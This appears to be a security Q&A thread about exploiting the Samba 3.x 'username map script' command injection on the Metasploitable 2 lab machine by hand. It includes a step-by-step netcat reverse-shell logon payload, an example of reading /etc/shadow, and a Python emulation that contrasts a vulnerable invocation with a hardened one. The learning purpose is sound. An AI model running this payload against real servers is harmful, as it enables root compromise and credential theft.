
I am trying to exploit Metasploitable 2 without the use of Metasploit, with the aim of learning. In this case, I am focusing on Samba 3.x (Port TCP 139, 445)

In this link http://www.rwbnetsec.com/samba-3-x/ two different methods are explained to exploit this machine after an nmap scan reveals TCP ports 139, and 445 open, which are running Samba version 3.x.

The second method explains that

This vulnerability takes advantage of the “username map script” functionality of Samba. There is no filtering of user input, so an attacker could connect to an SMB session, and use shell metacharacters as input for the username, causing the commands to be executed on the remote system. This could allow the attacker to gain a remote shell to the victim machine with root access.

My problem comes when Metasploit is used, as it is used in:

I finally found this video https://www.youtube.com/watch?v=-Y8-fZAvq9c that avoids Metasploit, but it doesn't work for me. It goes as follows (Kali=192.168.200.1; Metasploitable2=192.168.200.130):

  1. In Terminal window 1, we set netcat to listen:

    netcat -nlvp 4444

  2. In Terminal window 2, we check the share

    smbclient -L //192.168.200.130

  3. We focus on the tmp folder, and connect (Terminal 2):

    smbclient //192.168.200.130/tmp

  4. Finally, we obtain the "smb: \>" prompt, where the command "logon" is used to reverse connect to Kali, as

    smb: \> logon "/=nc 192.168.200.1 4444 -e /bin/bash"

This last point doesn't work for me; I get the following error message: "session setup failed: NT_STATUS_NO_MEMORY".

It is hard for me to find a good manual that explains the "logon" command. I tried changing the way netcat is used:

In point 1. I write

smb: \> nc -nlvp 4444 -e /bin/bash

In point 4. I write

smb: \> logon "/=`nc 192.168.200.1 4444 -e /bin/bash`"

Same result, same error message.

I really tried to do it by myself, but couldn't. I would be very grateful if you could help me.

Thank you in advance!!

J.g.

2 Answers


It looks like you are setting up your listener in smb (vulnerable box).

smb: \> nc -nlvp 4444 -e /bin/bash

What you should be doing is setting up the listener on your attacking box, using the following command instead:

nc -nlvp 4444 

Finally, from your smbclient session to Metasploitable2, you issue the command:

logon "/=`nc 'attack box ip' 4444 -e /bin/bash`"
schroeder

For those who had the same problem I had, here is how I solved it, following the previous answer and this link: Metasploitable 2 - Samba

The steps to follow are:

  1. We open Terminal window 1, and we set netcat to listen:

    netcat -nlvp 4444

  2. We open Terminal window 2, we check the victim shares:

    smbclient -L //192.168.200.130

  3. (Terminal 2) We focus on the tmp folder, and connect to victim:

    smbclient //192.168.200.130/tmp

  4. (Terminal 2) Finally, we obtain the smb: \> prompt, where the command logon is used to reverse connect to Kali, as

    smb: \> logon "/=`nc 192.168.200.1 4444 -e /bin/bash`"

Careful: do not forget the back tick.

  5. (Terminal 1) We can see the connection established and can enter our desired commands. Example:

    • id
    • hostname
    • uname -a
    • cat /etc/shadow

When prompted for a password, just press Enter (leave it empty).

schroeder
J.g.
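Why the backtick matters, as an added emulation that is not code from the original thread and not Samba's own code: the "username map script" setting hands the client-supplied logon username to a shell command line, so a username wrapped in backticks is evaluated as command substitution before the mapping script ever sees it, while the same text without backticks is just an argument. The block below models the vulnerable path (username spliced into a `/bin/sh -c` string) next to a hardened path (script invoked with the username as a single argv element) and uses a harmless `touch` of a marker file in place of `nc ... -e /bin/bash`. The script body, the `/=` username prefix taken from the thread, and the marker file are constructed for this demo; Metasploitable's real mapping script is not reproduced.

```python
"""Emulation of the Samba 3.x 'username map script' injection from the thread.

Constructed demo: a stand-in mapping script that just echoes its first
argument, a harmless payload (touch a marker file) instead of a netcat
reverse shell, and the two ways a server might invoke the script.
"""
import os
import subprocess
import tempfile

# Stand-in for the administrator's mapping script (constructed here).
MAP_SCRIPT_BODY = "#!/bin/sh\nprintf 'mapped:%s\\n' \"$1\"\n"


def write_map_script(directory: str) -> str:
    """Drop the stand-in mapping script into a scratch directory."""
    path = os.path.join(directory, "mapusers.sh")
    with open(path, "w") as fh:
        fh.write(MAP_SCRIPT_BODY)
    return path


def run_map_script_vulnerable(map_script: str, username: str) -> str:
    # Vulnerable pattern: the username is interpolated into one command
    # string and handed to /bin/sh -c, so backticks, $(...), ; and | are
    # interpreted by the shell before the script runs.
    cmd = f"/bin/sh {map_script} {username}"
    proc = subprocess.run(["/bin/sh", "-c", cmd], capture_output=True, text=True)
    return proc.stdout


def run_map_script_hardened(map_script: str, username: str) -> str:
    # Hardened pattern: no shell parses the username; it is passed as a
    # single argv element, so metacharacters reach the script as plain text.
    proc = subprocess.run(["/bin/sh", map_script, username],
                          capture_output=True, text=True)
    return proc.stdout


def attempt(runner, username_builder) -> tuple:
    """Simulate one 'logon' with the given invocation style and username shape.

    Returns (payload_ran, script_output). payload_ran is True only if the
    injected command actually executed (the marker file appeared).
    """
    with tempfile.TemporaryDirectory() as tmp:
        script = write_map_script(tmp)
        marker = os.path.join(tmp, "payload_ran")
        # Harmless stand-in for: nc 192.168.200.1 4444 -e /bin/bash
        username = username_builder(f"touch {marker}")
        output = runner(script, username)
        return os.path.exists(marker), output.strip()


# The two username shapes from the thread: with and without the backticks.
def with_backticks(payload: str) -> str:
    return f"/=`{payload}`"


def without_backticks(payload: str) -> str:
    return f"/={payload}"


if __name__ == "__main__":
    for runner in (run_map_script_vulnerable, run_map_script_hardened):
        for builder in (with_backticks, without_backticks):
            ran, out = attempt(runner, builder)
            print(f"{runner.__name__:28s} {builder.__name__:17s} "
                  f"payload_ran={ran} output={out!r}")
```

With the vulnerable invocation and backticks, the shell runs the payload first and substitutes its (empty) output, so the mapping script only ever sees `/=`; without the backticks the script just receives `/=touch` and the marker path as two ordinary arguments, which is consistent with the thread's "do not forget the back tick". The hardened invocation never runs the payload in either case.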